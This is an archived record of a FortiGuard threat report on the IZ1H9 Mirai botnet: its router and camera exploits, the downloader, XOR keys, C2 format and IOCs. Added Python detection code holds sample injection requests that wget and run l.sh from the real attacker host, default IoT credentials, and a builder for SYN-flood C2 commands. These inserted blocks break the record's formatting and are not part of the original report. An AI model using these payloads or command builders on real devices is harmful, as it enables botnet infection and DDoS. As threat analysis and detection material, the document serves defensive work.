{
	"id": "55212f59-6899-4485-ae4b-b835144a4c8f",
	"created_at": "2026-04-06T00:07:17.752797Z",
	"updated_at": "2026-04-10T13:12:22.603469Z",
	"deleted_at": null,
	"sha1_hash": "2375f902b5d1a682ff0686d2453ade0e99699037",
	"title": "IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2183055,
	"plain_text": "IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs\r\nBy Cara Lin\r\nPublished: 2023-10-09 · Archived: 2026-04-05 22:44:50 UTC\r\nAffected Platforms: Linux\r\nImpacted Users: Any organization\r\nImpact: Remote attackers gain control of the vulnerable systems\r\nSeverity Level: Critical\r\nIn September 2023, our FortiGuard Labs team observed that the IZ1H9 Mirai-based DDoS campaign had aggressively updated its arsenal of exploits. This variant carries thirteen exploit payloads, targeting D-Link devices, the Netis wireless router, Sunhillo SureLine, Geutebruck IP cameras, Yealink Device Management, Zyxel devices, the TP-Link Archer, Korenix JetWave, and TOTOLINK routers.\r\nBased on the trigger counts recorded by our IPS signatures, exploitation peaked on September 6, with trigger counts ranging from the thousands to tens of thousands. This highlights the campaign's capacity to infect vulnerable devices and rapidly expand its botnet by adopting recently released exploit code covering numerous CVEs.\r\nIn this article, we elaborate on how this threat leverages new vulnerabilities to control affected devices, along with the details of IZ1H9.\r\nhttps://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits\r\nPage 1 of 16\r\nFigure 1: Telemetry\r\nExploit Payloads\r\nFour payloads, CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, and CVE-2021-45382, target D-Link vulnerabilities. 
These critical-severity vulnerabilities allow a remote attacker to inject commands via a crafted request.\r\nFigure 2: D-Link exploit payload\r\nAnother exploit, CVE-2019-19356, targets the Netis WF2419. It exploits a remote code execution (RCE) vulnerability in the router's tracert diagnostic tool, which does not sanitize user input. The payload is injected through the “tools_ip_url” parameter and carries the “User-Agent: Dark” header used by the Dark.IoT botnet.\r\nFigure 3: Netis WF2419 exploit payload\r\nThe campaign also exploits vulnerabilities disclosed in 2021: CVE-2021-36380, which affects Sunhillo SureLine versions before 8.7.0.1.1; CVE-2021-33544/33548/33549/33550/33551/33552/33553/33554, which allow arbitrary command execution through parameters of various pages on Geutebruck products; and CVE-2021-27561/27562, which affect Yealink Device Management (DM) 3.6.0.20.\r\nFigure 4: Sunhillo/Geutebruck/Yealink exploit payload\r\nThe next exploit targets a vulnerability in the Zyxel device's /bin/zhttpd/ component. Insufficient input validation lets an attacker achieve remote code execution on Zyxel EMG3525/VMG1312 devices running firmware before V5.50.\r\nFigure 5: Zyxel exploit payload\r\nThe threat actor has also incorporated vulnerabilities disclosed in 2023 into the exploit payload list. 
CVE-2023-1389 targets the TP-Link Archer AX21 (AX1800), while CVE-2023-23295 affects the Korenix JetWave wireless AP.\r\nFigure 6: TP-Link/Korenix exploit payload\r\nCVE-2022-40475/25080/25079/25081/25082/25078/25084/25077/25076/38511/25075/25083 collectively represent a set of related vulnerabilities affecting TOTOLINK routers.\r\nFigure 7: TOTOLINK exploit payload\r\nThe last payload is unclear. It targets “/cgi-bin/login.cgi” and injects into the “key” parameter. A similar vulnerability affects the Prolink PRC2402M router, but this payload is missing a few parameters needed to achieve remote code execution. It is unclear whether the IZ1H9 campaign misused this payload or intended it for other devices.\r\nFigure 8: Exploit payload targets login.cgi\r\nShell Script Downloader\r\nThe payloads injected through the vulnerabilities above fetch a shell script downloader, “l.sh”, from hxxp://194[.]180[.]48[.]100. When executed, the script first deletes logs to conceal its actions. It then downloads and executes bot clients built for a range of Linux architectures. Finally, it blocks network connections on multiple ports by altering the device's iptables rules, as shown in Figure 9.\r\nFigure 9: Shell script downloader “l.sh”\r\nMalware Analysis - IZ1H9\r\nIZ1H9, a Mirai variant, infects Linux-based networked devices, especially IoT devices, turning them into remote-controlled bots for large-scale network attacks. 
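Every payload above follows the same pattern: a shell command smuggled into a request parameter that fetches and runs the l.sh downloader. As an added detection example (not code from the original post or from Fortinet), the following Python scans constructed HTTP requests for that pattern: shell metacharacters in a parameter value combined with a stager verb such as wget, the downloader names and hosts this report lists, the “tools_ip_url” and “/cgi-bin/login.cgi” key parameters named above, and the Dark.IoT “User-Agent: Dark” header. The request paths other than login.cgi, the source addresses, and the record layout are constructed placeholders; only the IOC host and script names come from the report.

```python
from urllib.parse import urlsplit, parse_qs

# Shell metacharacters that turn a benign parameter into a command injection.
SHELL_METACHARS = (';', '|', '`', '$(', '&&', '||')
# Verbs a Mirai-style stager needs to fetch and run its downloader.
STAGER_VERBS = ('wget', 'curl', 'tftp', 'ftpget', '/bin/sh', 'chmod', 'busybox')
# Downloader names and hosts listed in the report's IOCs.
KNOWN_DOWNLOADERS = ('l.sh', 'i.sh', 'lolol.sh', '194.180.48.100', '2.56.59.215', '212.192.241.72')
DARK_UA = 'Dark'   # User-Agent the report ties to the Dark.IoT botnet


def extract_params(uri, body):
    # Merge query-string and form-body parameters. parse_qs percent-decodes
    # values, so an encoded %3B is matched as ';' and '+' becomes a space.
    parts = urlsplit(uri)
    params = {}
    for source in (parts.query, body or ''):
        for name, values in parse_qs(source, keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    return parts.path, params


def classify(req):
    # Return the sorted list of rule names a single request trips (empty if clean).
    path, params = extract_params(req['uri'], req.get('body'))
    reasons = set()
    for name, values in params.items():
        for value in values:
            low = value.lower()
            has_meta = any(m in value for m in SHELL_METACHARS)
            has_verb = any(v in low for v in STAGER_VERBS)
            if has_meta and has_verb:
                reasons.add(f'cmd_injection:{name}')
            if any(ioc in low for ioc in KNOWN_DOWNLOADERS):
                reasons.add(f'known_downloader:{name}')
            # Report-specific parameters are only suspicious when they carry shell syntax;
            # the legitimate diagnostics and login pages use the same names.
            if name == 'tools_ip_url' and has_meta:
                reasons.add('netis_tools_ip_url_injection')
            if name == 'key' and path.endswith('/cgi-bin/login.cgi') and has_meta:
                reasons.add('login_cgi_key_injection')
    if req.get('user_agent') == DARK_UA:
        reasons.add('dark_iot_user_agent')
    return sorted(reasons)


def scan(requests):
    # Return (source, reasons) for every request that trips at least one rule.
    hits = []
    for req in requests:
        reasons = classify(req)
        if reasons:
            hits.append((req['src'], reasons))
    return hits


# Constructed sample requests (placeholder paths and source addresses; the
# downloader host and script name are the report's IOCs).
SAMPLE_REQUESTS = [
    {'src': '203.0.113.10', 'method': 'POST', 'uri': '/tools.cgi', 'user_agent': 'Dark',
     'body': 'tools_ip_url=127.0.0.1|wget+http%3A%2F%2F194.180.48.100%2Fl.sh+-O+%2Ftmp%2Fl.sh%3B+sh+%2Ftmp%2Fl.sh'},
    {'src': '203.0.113.11', 'method': 'GET', 'user_agent': 'Mozilla/5.0',
     'uri': '/cgi-bin/login.cgi?key=%24%28wget+http%3A%2F%2F194.180.48.100%2Fl.sh+-O-+%7C+sh%29'},
    {'src': '198.51.100.5', 'method': 'GET', 'user_agent': 'Mozilla/5.0',
     'uri': '/cgi-bin/login.cgi?key=abc123'},
    {'src': '198.51.100.6', 'method': 'POST', 'user_agent': 'Mozilla/5.0',
     'uri': '/tools.cgi', 'body': 'tools_ip_url=8.8.8.8'},
    {'src': '203.0.113.12', 'method': 'GET', 'user_agent': 'Dark', 'uri': '/'},
]

if __name__ == '__main__':
    for src, reasons in scan(SAMPLE_REQUESTS):
        print(src, reasons)
```

The two benign requests (a normal login and a plain tracert target) produce no findings because the parameter-name rules require shell syntax in the value; the bare Dark user agent is flagged on its own since the report identifies it as the botnet's marker. Percent-decoding before matching matters: the same payload URL-encoded as %3B or %7C would otherwise slip past a raw substring check.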
The XOR key used to decode the configuration is 0xBAADF00D, shown in Figure 10.\r\nFigure 10: Decoding configuration\r\nAdditional payload downloader URLs can be extracted from the decoded configuration in Figure 11, namely hxxp://2[.]56[.]59[.]215/i.sh and hxxp://212[.]192[.]241[.]72/lolol.sh. Both were used in May 2023.\r\nFigure 11: Partial decoded configuration\r\nIZ1H9 also carries a data section of preset login credentials for brute-force attacks. The XOR decoding key is 0x54, shown in Figure 12, and the decoded data is shown in Figure 13.\r\nFigure 12: XOR decoding for login credentials\r\nFigure 13: Decoded login credentials\r\nFor C2 communication, a victim first sends a check-in message containing the parameter “l.expl” to the C2 server “194[.]180[.]48[.]101:5034”, which responds with the keep-alive message “\\x00\\x00”. Once a compromised device receives a command from the C2 server, shown in Figure 14, it parses the packet to determine the DDoS attack method, target host, and packet count, if specified, before launching the attack. 
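As an added example (not from the original post), the following Python decodes constructed stand-ins for the two obfuscated data sections described above and recovers a single-byte XOR key by brute force, which is how an analyst arrives at a value like 0x54 when the key is not known in advance. Assumptions the report does not state: the 32-bit key 0xBAADF00D is applied the way the original Mirai table decoder applies its key (each byte XORed with all four key bytes in turn, which collapses to one effective byte), the tables are NUL-separated strings, and each credential entry is stored as user:password. The encoded blobs are built here from plaintext with the same symmetric XOR and are not bytes from the sample; the two URLs and the l.expl string are the ones the report names, while the credential list is a generic Mirai-style list, not the contents of Figure 13.

```python
SEP = bytes(1)   # single NUL byte as entry separator (assumed table layout)


def fold_key(key32):
    # Mirai's table decoder XORs every byte with k1, k2, k3 and k4 in turn,
    # so a 32-bit key collapses to one effective byte. Assumed for this sample.
    return (key32 ^ (key32 >> 8) ^ (key32 >> 16) ^ (key32 >> 24)) & 0xFF


def xor_bytes(data, key8):
    return bytes(b ^ key8 for b in data)


CONFIG_KEY = 0xBAADF00D   # configuration key from the report (Figure 10)
CRED_KEY = 0x54           # credential key from the report (Figure 12)

# Constructed plaintext tables; the blobs below stand in for the binary's data sections.
CONFIG_PLAIN = SEP.join([b'http://2.56.59.215/i.sh', b'http://212.192.241.72/lolol.sh', b'l.expl']) + SEP
CRED_PLAIN = SEP.join([b'root:xc3511', b'root:vizxv', b'admin:admin', b'root:default',
                       b'support:support', b'user:user']) + SEP
CONFIG_BLOB = xor_bytes(CONFIG_PLAIN, fold_key(CONFIG_KEY))
CRED_BLOB = xor_bytes(CRED_PLAIN, CRED_KEY)


def decode_table(blob, key8):
    # XOR the whole section, then split on the NUL separator and drop empties.
    plain = xor_bytes(blob, key8)
    return [entry.decode('latin-1') for entry in plain.split(SEP) if entry]


def extract_urls(entries):
    return [e for e in entries if e.startswith(('http://', 'https://'))]


# Strings an analyst expects to see in a Mirai-style table; used to score candidate keys.
WORDLIST = (b'http', b'root', b'admin', b'user', b'support', b'default')


def recover_single_byte_key(blob):
    # Try all 256 keys; score by printable/NUL bytes plus a large bonus per known word,
    # so the key that yields readable strings with expected vocabulary wins.
    best_key, best_score = None, -1
    for key in range(256):
        plain = xor_bytes(blob, key)
        printable = sum(1 for b in plain if b == 0 or 0x20 <= b <= 0x7E)
        hits = sum(1 for word in WORDLIST if word in plain)
        score = hits * 100 + printable
        if score > best_score:
            best_key, best_score = key, score
    return best_key


def parse_credentials(blob, key8):
    # Split each decoded user:password entry (assumed format) into a pair.
    pairs = []
    for entry in decode_table(blob, key8):
        user, _, password = entry.partition(':')
        pairs.append((user, password))
    return pairs


if __name__ == '__main__':
    print(hex(fold_key(CONFIG_KEY)), extract_urls(decode_table(CONFIG_BLOB, fold_key(CONFIG_KEY))))
    key = recover_single_byte_key(CRED_BLOB)
    print(hex(key), parse_credentials(CRED_BLOB, key))
```

Recovering the key from the configuration blob returns 0xEA, the folded form of 0xBAADF00D, which is why a brute-forced byte and a 32-bit constant found in the binary can both be correct descriptions of the same decoder.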
The message structure is as follows:\r\n\\x00\\x28: Message packet length\r\n\\x0c: TCP SYN attack\r\n\\x02: Two options follow\r\n\\x08\\x12: Target option ID and value length\r\n\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f … \\x69\\x73: https://…is (target)\r\n\\x18\\x04: Packet count option ID and value length\r\n\\x35\\x30\\x30\\x30: 5000 packets\r\nFigure 14: C2 communication\r\nFigure 15: TCP SYN flood attack\r\nFigure 16: DDoS attacking methods\r\nConclusion\r\nIoT devices have long been an attractive target for threat actors, with remote code execution attacks posing the most common and concerning threat to both IoT devices and Linux servers. Exposed vulnerable devices pose severe security risks. Despite the availability of patches for these vulnerabilities, the number of exploit triggers remains alarmingly high, often numbering in the thousands.\r\nWhat amplifies the impact of the IZ1H9 campaign is how quickly it adds newly disclosed vulnerabilities to its exploit list. 
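As an added example (not the report's or the malware's code), the following Python builds and parses a command in the framing annotated above: a 2-byte big-endian length, a 1-byte attack type (0x0c = TCP SYN), a 1-byte option count, then options as (id, length, value) with 0x08 carrying the target and 0x18 the ASCII packet count. That the length prefix counts the whole message including itself, and that option lengths are one byte, are assumptions drawn from reading the annotation; the target https://target.invalid is a placeholder because the report elides the real one, and 0x0c is the only attack ID the report documents. The parser rejects truncated messages and options that run past the declared length, treats the two zero bytes as the keep-alive, and recognizes the l.expl check-in marker.

```python
import struct

ATTACK_TYPES = {0x0C: 'tcp_syn'}   # only the ID the report documents
OPT_TARGET = 0x08                  # option carrying the target host/URL
OPT_COUNT = 0x18                   # option carrying the packet count as ASCII digits
KEEPALIVE = bytes(2)               # the two zero bytes the C2 answers a check-in with
CHECKIN_MARKER = b'l.expl'         # string the bot sends in its first message


def build_command(attack_id, options):
    # Serialize an attack command; used here to construct a realistic sample.
    body = bytes([attack_id, len(options)])
    for opt_id, value in options:
        if len(value) > 255:
            raise ValueError('option value too long for a 1-byte length field')
        body += bytes([opt_id, len(value)]) + value
    # Assumption: the big-endian prefix counts the whole message, prefix included.
    return struct.pack('>H', len(body) + 2) + body


def parse_command(msg):
    # Parse one C2 message as the bot would, but refuse anything malformed.
    if len(msg) < 2:
        raise ValueError('short message')
    (length,) = struct.unpack('>H', msg[:2])
    if length == 0:
        return {'type': 'keepalive'}
    if length != len(msg):
        raise ValueError(f'length field {length} != {len(msg)} bytes received')
    if length < 4:
        raise ValueError('no attack header')
    attack_id, n_opts = msg[2], msg[3]
    cmd = {'type': 'attack', 'attack_id': attack_id,
           'attack': ATTACK_TYPES.get(attack_id, 'unknown'),
           'target': None, 'count': None, 'options': {}}
    pos = 4
    for _ in range(n_opts):
        if pos + 2 > length:
            raise ValueError('truncated option header')
        opt_id, opt_len = msg[pos], msg[pos + 1]
        pos += 2
        if pos + opt_len > length:
            raise ValueError('option value runs past message end')
        value = msg[pos:pos + opt_len]
        pos += opt_len
        cmd['options'][opt_id] = value
        if opt_id == OPT_TARGET:
            cmd['target'] = value.decode('ascii', 'replace')
        elif opt_id == OPT_COUNT:
            cmd['count'] = int(value) if value.isdigit() else None
    if pos != length:
        raise ValueError('trailing bytes after last option')
    return cmd


def is_checkin(first_payload):
    return CHECKIN_MARKER in first_payload


def rejects(msg):
    # True if the parser refuses the message; convenient for negative checks.
    try:
        parse_command(msg)
    except ValueError:
        return True
    return False


# Constructed sample: TCP SYN against a placeholder target, 5000 packets.
SAMPLE_COMMAND = build_command(0x0C, [(OPT_TARGET, b'https://target.invalid'), (OPT_COUNT, b'5000')])

if __name__ == '__main__':
    print(SAMPLE_COMMAND.hex())
    print(parse_command(SAMPLE_COMMAND))
```

A network sensor can apply the same parser to traffic toward the port named above: a session that opens with the check-in marker, receives two zero bytes, and later carries a well-formed command whose option 0x08 decodes to a hostname is the pattern described in Figures 14 and 15.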
Once an attacker gains control of a vulnerable device, they can add it to their botnet and use it to launch further attacks such as DDoS and brute-force.\r\nTo counter this threat, organizations should promptly apply patches when they become available and always change the default login credentials on their devices.\r\nFortinet Protections\r\nThe malware described in this report is detected and blocked by FortiGuard Antivirus as:\r\nBASH/Mirai.AEH!tr.dldr\r\nELF/Mirai.AT!tr\r\nELF/Mirai.GG!tr\r\nLinux/Mirai.L!tr\r\nLinux/Mirai.REAL!tr\r\nLinux/Mirai.IZ1H9!tr\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine is part of each of those solutions, so customers running these products with up-to-date protections are protected.\r\nFortinet has also released IPS signatures to proactively protect customers from the threats in the exploit list.\r\nThe URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, a module on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nThe FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response 
Team.\r\nIOCs\r\nURLs:\r\n194[.]180[.]48[.]100\r\n2[.]56[.]59[.]215\r\n212[.]192[.]241[.]72\r\nFiles:\r\nc8cf29e56760c50fa815a0c1c14c17641f01b9c6a4aed3e0517e2ca722238f63\r\n1e15d7cd0b4682a86620b3046548bdf3f39c969324a85755216c2a526d784c0d\r\n7b9dce89619c16ac7d2e128749ad92444fe33654792a8b9ed2a3bce1fee82e6a\r\nb5daf57827ced323a39261a7e19f5551071b5095f0973f1397d5e4c2fcc39930\r\nb523ea86ebfd666153078593476ca9bd069d6f37fa7846af9e53b1e01c977a17\r\n8d07f15dd7d055b16d50cb271995b768fdd3ca6be121f6a35b61b917dfa33938\r\n34628bcfc40218095c65678b52ce13cea4904ce966d0fd47e691c3cb039871ec\r\nafc176f7b692a5ff93c7c66eee4941acf1b886ee9f4c070faf043b16f7e65c11\r\ndf9ee47c783fbe8c3301ed519033fc92b05d7fd272d35c64b424a7e46c6da43b\r\n737ba9e84b5166134d491193be3305afa273733c35c028114d8b1f092940b9a3\r\n0aa9836174f231074d4d55c819f6f1570a24bc3ed4d9dd5667a04664acb57147\r\nSource: https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits"
	],
	"report_names": [
		"Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits"
	],
	"threat_actors": [],
	"ts_created_at": 1775434037,
	"ts_updated_at": 1775826742,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2375f902b5d1a682ff0686d2453ade0e99699037.pdf",
		"text": "https://archive.orkl.eu/2375f902b5d1a682ff0686d2453ade0e99699037.txt",
		"img": "https://archive.orkl.eu/2375f902b5d1a682ff0686d2453ade0e99699037.jpg"
	}
}